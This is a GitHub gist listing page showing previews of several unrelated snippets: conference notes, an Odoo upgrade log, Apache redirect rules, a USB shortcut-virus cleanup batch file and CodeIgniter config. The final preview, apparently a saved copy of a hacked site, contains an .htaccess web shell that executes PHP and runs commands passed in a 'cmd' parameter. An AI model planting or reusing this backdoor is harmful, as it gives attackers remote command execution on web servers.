Skip to content

Instantly share code, notes, and snippets.

@Barneybook
Barneybook / copy_file.txt
Last active May 27, 2024 12:14
Anna Su notes 「 2024 Generative AI 年會 」 2024年5月26日 星期天上午3:06
FB原文連結:
https://www.facebook.com/permalink.php?story_fbid=pfbid02kZPjdn4fqsRc3ZUm8pqBdHySwUAVMQBDJzxHqey8w6mTfKtJJvtoRV7Fqne7UEcRl&id=100068893800768
✨ 2024 Generative AI 年會 ✨
本日共 🔟 場議程,簡單紀錄部分內容
官方共筆
👉 https://hackmd.io/@ejc/2024gaiconf
詳細筆記可參考官方共筆文件,連結放下方留言 👇
=======================================================
Odoo.sh: Uploading database to the Upgrade platform
Transfer started at 13-Mar 08:22 UTC
progress: 7% 13-Mar 08:22 UTC
progress: 26% 13-Mar 08:22 UTC
progress: 57% 13-Mar 08:22 UTC
progress: 88% 13-Mar 08:22 UTC
progress: 100% 13-Mar 08:22 UTC
The following log is the output of the upgrade process
@Barneybook
Barneybook / .htaccess
Last active May 7, 2020 09:32
IP 35.53.125.135 to abc.com (IP 跳轉 domain) Redirect IP address to Domain name Apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^35\.53\.125\.135$
RewriteRule ^(.*)$ http://abc.com/$1 [L,R=301]
</IfModule>
@Barneybook
Barneybook / 刪除並修復隨身碟捷徑病毒v3.3.bat
Created May 13, 2019 06:45
刪除並修復隨身碟捷徑病毒v3.3.bat
@echo off
echo =========捷徑病毒修復程式說明=========
echo;
echo 編輯者:Lun 2017.12.06 版本:v3.3
echo;
echo 適用狀況:所有檔案皆變為捷徑檔、隨身碟點開變為捷徑。
echo;
echo 修復程式僅會刪除病毒檔案,其餘非病毒相關檔案並不影響。
echo;
echo 程式請以→右鍵→"系統管理員身分執行"
@Barneybook
Barneybook / 201805.md
Last active May 31, 2018 09:04
2018年5月各種紀錄
@Barneybook
Barneybook / Telegram_it_group_list.md
Last active May 15, 2024 12:02
Telegram 資訊相關 群組清單
@Barneybook
Barneybook / config.php
Last active April 2, 2023 06:07
Codeigniter base_url setting
<?php
// false
$root = ($_SERVER['SERVER_PORT'] == 443 ? 'https' : 'http');
// false
$root = "http".((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == "on") ? "s" : "");
// false
$root = (empty($_SERVER['HTTPS']) OR strtolower($_SERVER['HTTPS']) === 'off') ? 'http' : 'https';
@Barneybook
Barneybook / .htaccess
Last active December 4, 2016 03:46
Hack data backup 20161202
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']);?>
# BEGIN rlrssslReallySimpleSSL rsssl_version[2.4.1]
<IfModule mod_rewrite.c>
RewriteEngine on